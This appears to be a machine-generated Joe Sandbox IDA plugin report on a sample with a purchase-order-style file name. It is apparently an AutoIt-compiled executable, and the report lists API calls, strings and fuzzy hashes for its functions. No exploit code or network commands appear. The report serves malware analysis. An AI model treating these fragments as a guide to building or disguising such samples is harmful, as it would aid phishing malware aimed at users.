                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$DestroyMove
                                                                    • String ID: static
                                                                    • API String ID: 2139405536-2160076837
                                                                    • Opcode ID: 177d82229b3fac1db4166e3c1a0f5455a9f4839df53f8fbb4a3c7f6dfcaffc3d
                                                                    • Instruction ID: d780b827b6bc0f9eb0e8ea0f6b86bf122069799b3c5a81b705a71049fa8a86ed
                                                                    • Opcode Fuzzy Hash: 177d82229b3fac1db4166e3c1a0f5455a9f4839df53f8fbb4a3c7f6dfcaffc3d
                                                                    • Instruction Fuzzy Hash: F9318D71200604AEDF109F64CC84BFB73A9FF48760F108619F9A9D7190DB31AD92E760
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C72911
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C7294C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: InfoItemMenu_memset
                                                                    • String ID: 0
                                                                    • API String ID: 2223754486-4108050209
                                                                    • Opcode ID: 270be9f7e1480cf2c17967ab7e11578faa4eb46bb8788c357eb8e6c2e4528f70
                                                                    • Instruction ID: 10e24410106bcee6bacecceff6be8fae3b25273c4a781ec34c8464768a34dff9
                                                                    • Opcode Fuzzy Hash: 270be9f7e1480cf2c17967ab7e11578faa4eb46bb8788c357eb8e6c2e4528f70
                                                                    • Instruction Fuzzy Hash: 0731E631A003059FEF24DF59DC45BAEBBF8FF45350F188019EAD9A61A0D7709A40DB51
                                                                    APIs
                                                                    • __snwprintf.LIBCMT ref: 00C83A66
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __snwprintf_memmove
                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                    • API String ID: 3506404897-2584243854
                                                                    • Opcode ID: d896b01a79809b50fdb65285ceede9071d1415f17c6253441458dd9c928777c8
                                                                    • Instruction ID: 57a6c3c9f690ab97bcd2377e5eaacf762b1f4b279b3f3c454b5e3e5a933ab4f4
                                                                    • Opcode Fuzzy Hash: d896b01a79809b50fdb65285ceede9071d1415f17c6253441458dd9c928777c8
                                                                    • Instruction Fuzzy Hash: 44219331600119AFCF14FFA4CC91EEE77B5AF45740F500468F445A7281DB34EA86EBA5
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C96761
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C9676C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: Combobox
                                                                    • API String ID: 3850602802-2096851135
                                                                    • Opcode ID: 8a2dd803ad027c1d0aab768f718106093f563c0e9e65c6459b97fb8046081f35
                                                                    • Instruction ID: 814f690ac96abcdd87066f09159f6a416c0beb112fbb0eb9a02e76bc982f0686
                                                                    • Opcode Fuzzy Hash: 8a2dd803ad027c1d0aab768f718106093f563c0e9e65c6459b97fb8046081f35
                                                                    • Instruction Fuzzy Hash: B811B271200208BFEF119F94DC88FFB376AEB493A8F114129F924972D0D6319D5197A0
                                                                    APIs
                                                                      • Part of subcall function 00C11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C11D73
                                                                      • Part of subcall function 00C11D35: GetStockObject.GDI32(00000011), ref: 00C11D87
                                                                      • Part of subcall function 00C11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C11D91
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00C96C71
                                                                    • GetSysColor.USER32(00000012), ref: 00C96C8B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                    • String ID: static
                                                                    • API String ID: 1983116058-2160076837
                                                                    • Opcode ID: bce20521d175b1ceb7dd467e612616eb5778566023e088163a52d0b6c25ee407
                                                                    • Instruction ID: be88aac1e909ddd468c8042d7a21d972948b0a74afffaa3796e68e5013f8fc01
                                                                    • Opcode Fuzzy Hash: bce20521d175b1ceb7dd467e612616eb5778566023e088163a52d0b6c25ee407
                                                                    • Instruction Fuzzy Hash: B8212972510209AFDF04DFA8CC49AFA7BA8FB08314F154629FD95D2250D635E861DB60
                                                                    APIs
                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00C969A2
                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C969B1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: LengthMessageSendTextWindow
                                                                    • String ID: edit
                                                                    • API String ID: 2978978980-2167791130
                                                                    • Opcode ID: c1614dbddcb9c77c1e112d9354c9fc78b9efe73089c019da48bbc98df346dd88
                                                                    • Instruction ID: e1e767756b5d361b798b73c28d5f58b2a6fefbf98c54e8ebbe3e2ec4379b72e2
                                                                    • Opcode Fuzzy Hash: c1614dbddcb9c77c1e112d9354c9fc78b9efe73089c019da48bbc98df346dd88
                                                                    • Instruction Fuzzy Hash: BB116A71510208ABEF109F649C48FEB37A9EB053B8F624728F9B5971E0C635DC91A760
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C72A22
                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00C72A41
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: InfoItemMenu_memset
                                                                    • String ID: 0
                                                                    • API String ID: 2223754486-4108050209
                                                                    • Opcode ID: 1f2a2556a2297d6cc763bf7ac1a646c2293b28dc4e0f449d6afc87fb0b23a1cc
                                                                    • Instruction ID: 8324451a4ff0c47630ca8b77822833049f444d9bf7208b762ea79768511e5552
                                                                    • Opcode Fuzzy Hash: 1f2a2556a2297d6cc763bf7ac1a646c2293b28dc4e0f449d6afc87fb0b23a1cc
                                                                    • Instruction Fuzzy Hash: 7811C472D01114ABDF30DB99DC44BAEB7B8EB45320F158026E96DE7290D770EE0AE791
                                                                    APIs
                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C8222C
                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C82255
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$OpenOption
                                                                    • String ID: <local>
                                                                    • API String ID: 942729171-4266983199
                                                                    • Opcode ID: 7dc911409ca9aa70a2e321b104d791f17a2cb6939a28938bc0dc9382be60f861
                                                                    • Instruction ID: e9b7d0f03d659e1b36fc0344ec38b2122036829aba3587c321cbbccd56930565
                                                                    • Opcode Fuzzy Hash: 7dc911409ca9aa70a2e321b104d791f17a2cb6939a28938bc0dc9382be60f861
                                                                    • Instruction Fuzzy Hash: FA11C670541225BADB25AF51CCCCFBBFBA8FF16769F10822AF51586000D2705955D7F4
                                                                    APIs
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                      • Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC
                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C68E73
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 372448540-1403004172
                                                                    • Opcode ID: a310a2c288e098834ad31ae38b67a3c0b58bc0567b2167e0d219fe2d3f1ac1cf
                                                                    • Instruction ID: 3a2f88e5ee563e8f5f3287355f33d87c7a99400b11e9fff0bf4ea1215b9c0a63
                                                                    • Opcode Fuzzy Hash: a310a2c288e098834ad31ae38b67a3c0b58bc0567b2167e0d219fe2d3f1ac1cf
                                                                    • Instruction Fuzzy Hash: BA0128B5601218ABCB24FBA0CC85DFE7368EF02320B400719F831672D2DE32580CEA50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock_memmove
                                                                    • String ID: EA06
                                                                    • API String ID: 1988441806-3962188686
                                                                    • Opcode ID: e6e1ccd73f4708074a2db669f098ac82492b03e7dd4e68e3fd2956eb90b97345
                                                                    • Instruction ID: f2d69e19110ccdf925c653cb8e4716c1782aa7fcad23842436c8c1d4cf4ecfc6
                                                                    • Opcode Fuzzy Hash: e6e1ccd73f4708074a2db669f098ac82492b03e7dd4e68e3fd2956eb90b97345
                                                                    • Instruction Fuzzy Hash: E701F9729042187EDB28CAA8C816EEE7BF8DB11301F00419EF556D2181E874E6089B60
                                                                    APIs
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                      • Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC
                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C68D6B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 372448540-1403004172
                                                                    • Opcode ID: 8736880f1cbdcafa90ac5776b4c6f3816c5af5ec086217a91ae957518d5d1291
                                                                    • Instruction ID: d1c3cac79861d66e432649a892b0b4b4c2be268dd89ce792563775f9393bb427
                                                                    • Opcode Fuzzy Hash: 8736880f1cbdcafa90ac5776b4c6f3816c5af5ec086217a91ae957518d5d1291
                                                                    • Instruction Fuzzy Hash: B101D471A41109ABCF24EBE0C996EFE73A8DF16300F10012AB911772D2DE119E0CFA71
                                                                    APIs
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                      • Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC
                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C68DEE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 372448540-1403004172
                                                                    • Opcode ID: 2e03ceb41bf7dfdb765c466e9375b6d3d86c676fdd6dd3821847b00d9551dc6a
                                                                    • Instruction ID: 964ef9d91e145ee42f12d5a299d549964472eb75aac6a34c4351422e0bfd8173
                                                                    • Opcode Fuzzy Hash: 2e03ceb41bf7dfdb765c466e9375b6d3d86c676fdd6dd3821847b00d9551dc6a
                                                                    • Instruction Fuzzy Hash: 6C01A771A41109ABDB21E6A4C986EFE77ACDF12300F10011AB915732D2DE114E0DF671
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName_wcscmp
                                                                    • String ID: #32770
                                                                    • API String ID: 2292705959-463685578
                                                                    • Opcode ID: 5695fa1a3abf6d2e28225e9d80593614dcfb4aa6c03b8491fa6cebf2fdbb634a
                                                                    • Instruction ID: 93f9b53694ebe5274f6e40ba3adca7a87036a1670cdcbdad79170bb05823a235
                                                                    • Opcode Fuzzy Hash: 5695fa1a3abf6d2e28225e9d80593614dcfb4aa6c03b8491fa6cebf2fdbb634a
                                                                    • Instruction Fuzzy Hash: 5AE0D8326002282BE7209B99EC49FABF7ACEB45B70F00006BFD04D3051EA609B55C7E1
                                                                    APIs
                                                                      • Part of subcall function 00C4B314: _memset.LIBCMT ref: 00C4B321
                                                                      • Part of subcall function 00C30940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C4B2F0,?,?,?,00C1100A), ref: 00C30945
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00C1100A), ref: 00C4B2F4
                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C1100A), ref: 00C4B303
                                                                    Strings
                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C4B2FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                    • API String ID: 3158253471-631824599
                                                                    • Opcode ID: b5b9d1d61d847d2f34d238644ebf3f8632afa69fee6da16ca72ae14a6a3e1fd8
                                                                    • Instruction ID: 866f2ba4c054e58de5f2c0504afd9582c560e53f466e8bb933da12d04d87a10d
                                                                    • Opcode Fuzzy Hash: b5b9d1d61d847d2f34d238644ebf3f8632afa69fee6da16ca72ae14a6a3e1fd8
                                                                    • Instruction Fuzzy Hash: 17E012B02007518FD720DF2AD50878A7BE4BF04755F11897DE496C7661EBF4D845CBA1
                                                                    APIs
                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C67C82
                                                                      • Part of subcall function 00C33358: _doexit.LIBCMT ref: 00C33362
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Message_doexit
                                                                    • String ID: AutoIt$Error allocating memory.
                                                                    • API String ID: 1993061046-4017498283
                                                                    • Opcode ID: 0c7c5a77029cf618fa7f739054ed446c31645722454a13072723d68211e1713e
                                                                    • Instruction ID: 7bf24a0598e30fa020494c48de97fe54675f9ed8f27f70f7bbea440d819dab58
                                                                    • Opcode Fuzzy Hash: 0c7c5a77029cf618fa7f739054ed446c31645722454a13072723d68211e1713e
                                                                    • Instruction Fuzzy Hash: 9CD05B323D836C36D21532A5AC07FDE75488F06F57F144436FF14995D349D2859162F5
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 00C51775
                                                                      • Part of subcall function 00C8BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00C5195E,?), ref: 00C8BFFE
                                                                      • Part of subcall function 00C8BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C8C010
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00C5196D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                    • String ID: WIN_XPe
                                                                    • API String ID: 582185067-3257408948
                                                                    • Opcode ID: ec6d94e3d147dc5c44a0a74c70481995f6e38134524f2a77f61bdabaddd92ac7
                                                                    • Instruction ID: ea50502af276b9c9604d3f074d60a8b4dade2adcf57bcde30e167674e4f3a1c8
                                                                    • Opcode Fuzzy Hash: ec6d94e3d147dc5c44a0a74c70481995f6e38134524f2a77f61bdabaddd92ac7
                                                                    • Instruction Fuzzy Hash: 3BF0A574801109EBDB15DB95C988BECBBB8AB08346F580096E912A21A1D7758F89DF64
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C959AE
                                                                    • PostMessageW.USER32(00000000), ref: 00C959B5
                                                                      • Part of subcall function 00C75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C752BC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: 6b65fcacab57586cf225035fdec61505175f23f40fcf2d16057b7ead80f61c95
                                                                    • Instruction ID: db4f6b5dedf980ed91e5d5cfb0d7543bafb16027f6badaa253d2075a58198b2a
                                                                    • Opcode Fuzzy Hash: 6b65fcacab57586cf225035fdec61505175f23f40fcf2d16057b7ead80f61c95
                                                                    • Instruction Fuzzy Hash: 6DD0C9317843117BE664AB709C0FF9B6614AB04B50F01083AB25AEA1D1C9E0A801C654
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C9596E
                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C95981
                                                                      • Part of subcall function 00C75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C752BC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
